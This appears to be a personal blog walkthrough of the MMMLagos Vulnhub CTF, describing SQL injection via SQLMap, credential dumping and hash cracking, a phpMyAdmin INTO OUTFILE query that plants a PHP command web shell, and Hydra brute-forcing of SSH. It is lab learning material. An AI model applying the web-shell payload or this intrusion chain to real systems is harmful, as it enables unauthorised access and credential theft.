MMMLagos 1.1 CTF Walkthrough

This write-up is about a vulnerable web application on Vulnhub called MMMLagos. The author says, “MMMLAGOS is a vulnerable ponzing scheme with lot of vulnerabilities” (Silex, 2017). I had never done any similar write-up before this so you will have to forgive my blunder if there was any one.

At first I had some kind of challenges downloading the VM image because it always gets corrupted. I was downloading the one hosted on the author’s website instead of the one hosted on Vulnhub because Vulnhub doesn’t support multi-threaded download and always gets disconnected before the download could be completed. I even met with the author when I visited Abuja and he gave me a copy on a flash drive but that copy was different from the one uploaded to Vulnhub and was several gigabytes larger. Somehow, I was able to download the image from Vulnhub successfully and checked the file checksum and it matched.

Get Adewale Olalekan’s stories in your inbox

Join Medium for free to get updates from this writer.

So, I set out to see what I can find and import the VM image in Oracle VirtualBox. After booting the virtual machine, I was presented with the following. I tried to guess the root password but was wrong.

I opened a terminal and use netdiscover to find out the IP of the VM.

And then proceeded to map the IP to a hostname and use mmmlagos.local as the hostname. I fired up nmap to know the list of services running on the VM.

Knowing there was a web server on port 80 and 443, I opened the service on port 80 and was presented with the following.

And since I didn’t have any credential to log in to the running web application, I decided to sign up and clicked on “Join Now”. I signed up with the following information. There were other information that could not fit in the window.

After signing up, I logged in to the application but first setup Burpsuite proxy so that all request go through Burp. I tried to see if some hidden directories were revealed in Burp but there was nothing extraordinary. Then I tried to find out if there could be presence of SQL injection in the login page parameters. I copied the login post data from burp history and save to file and fed that to SQLMap. But to my surprise, SQLMap could not find any injection.

I checked the request from Burp history that was saved to file and noticed that some of the POST data were URL-encoded. I used Burp decoder to decode this and edit the file to reflect the new changes.

I tried again with SQLMap but this time the password parameter was found to be vulnerable to SQL injection and was able to dump the databases. There were a couple of databases but I found out that current database was ponzi and the database user was running as root. And that gave me an idea that the DB user will have a write access to the database.

I tried to gain OS shell with SQLMap but didn’t work. I also tried to read the /etc/passwd file to determine the local users so I can run a bruteforce attack against the SSH service but that didn’t work either. So I dumped the web application admin user password which was in clear-text and mysql users MD5 hashed passwords. SQLMap was able to crack the user phpmyadmin password hash but not the root user password hash. I cracked the root password hash using Hashkiller website. Since I already know the web application admin password, I visited the admin page at /admin.php but redirected to adminlogin.php. I logged in as admin was presented with the first flag.

I logged out of the admin dashboard and visited the PHPMyadmin login page. I logged in as user root and was trying to figure out how I can get shell on the web server to know the local users. Then I came across this article that says we can run an sql statement to create a command php shell in the web server root directory. Since I already know this is a Ubuntu web server, the web root directory should be at /var/www/html. I ran the SQL query SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “var/www/html/backdoor.php”. I opened this file in the browser but there was nothing and I passed the ls command as argument and the directories and files in the web root were listed.

Press enter or click to view image in full size

I proceeded to cat the /etc/passwd file and voila, there it was.

I created a file with the list of the users found that can login and has home directories and downloaded a password wordlist of common passwords. I fed that to Hydra to bruteforce the login for the SSH service. After a while, the password for user naijaseccon was found.

I SSHed to the server and the SSH login banner revealed yet another flag.

I tried to find out if user naijaseccon was a member of the sudoer group and yes it was. Since I have the sudo privilege, I can read any files on the server and I listed all the users in the home partition. I changed to user Cashnaija home directory and there was a file named Classified.txt. I cat the file and the third flag was at the bottom.

There were already a hint from the web application /flag.htm page that there were 3 flags. I know these flags were hashes of different types but didn’t try to crack them as there was no use. But I’d be glad to know their plain-text if anyone will be willing to crack them. There was also no need of running a local exploit to elevate privilege since our user already have that.

And this was how MMMLagos CTF flags were captured. You can leave some good claps. Thank you for taking your time to read this.